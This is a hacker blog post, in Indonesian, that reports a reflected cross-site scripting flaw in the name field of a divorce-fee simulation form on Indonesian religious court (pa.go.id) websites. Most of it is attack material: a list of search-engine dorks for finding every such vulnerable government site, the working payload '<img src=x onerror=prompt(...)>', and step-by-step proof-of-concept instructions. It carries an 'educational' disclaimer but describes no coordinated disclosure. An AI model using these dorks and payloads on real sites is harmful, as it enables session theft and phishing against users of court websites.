XSS Discovered on Panjar.pa By 0x6ick

XSS Discovered on Panjar.pa By 0x6ick



[!]Dork: 

inurl:pa.go.id inurl:panjar
inurl:pa- intitle:"Pengadilan Agama" inurl:panjar
site:pa.go.id inurl:panjar
inurl:"/ar/" inurl:"panjar" site:pa.go.id
"Cetak SKUM" inurl:pa.go.id
inurl:pa.go.id intitle:"Cerai Gugatan" 
site:go.id inurl:pa inurl:panjar

[!] Target:

[+] Bug Detail:

Found bug Reflected Cross-Site Scripting (XSS) pada form input Nama di halaman simulasi biaya cerai.

Payload yang berhasil men-trigger XSS:
<img src=x onerror=prompt("XSSby0x6ick")>
Parameter vulnerable:
  • Input field: Nama Lengkap Anda

[+] Proof of Concept (PoC):

  • Step 1: Masukkan payload berikut pada field Nama Lengkap Anda:
<img src=x onerror=prompt("XSSby0x6ick")>
  • Step 2: Submit form sampai muncul pop-up dari browser.

[+] pict

  • Input Payload di Form



  • Pop-up XSS Berhasil Muncul


Di web ini Script jso tidak bisa

Dengan script html? Bisalah

Pertama buat sc disini->
terus copas semua scriptnya di bagian nama yang lain isi ngasal

Hasil



[+] Dampak:

  • Potensi pencurian session cookies, phishing, dan eskalasi serangan.
  • Risiko bagi user .go.id yang mengakses halaman ini.

[+] Discovered By:

0x6ick | 0x6sec: Hack, Patch, and Protect


[!] Catatan Etis:

Artikel ini hanya untuk tujuan edukasi dan meningkatkan keamanan siber di Indonesia.
  

Untuk artikel xss selanjutnya di sini

Post a Comment

Lebih baru Lebih lama

Mengenai Saya

Foto saya
6ickzone
I've been deep in the world of cybersecurity, crypto, AI, and hacking for years. This blog is where I share my journey, tools, tips, and everything I learn along the way. But beyond code and exploits, there's also rhythm. I'm also exploring the digital soundscape — producing beats, fusing dark tech vibes with trap, drill, and EDM. Music is my second language, and it's where I channel the energy of the underground digital world. From my early days as a defacer to my current focus on ethical hacking and experimental music, I’m building 6ickzone as a hybrid space where hacking meets art. Why 6ickzone? 6ickzone is more than just a blog — it's a realm where hackers, beatmakers, and digital renegades gather. Whether you're here for the tools or the tunes, welcome to the zone.
Lihat profil lengkapku

Cari Blog Ini

About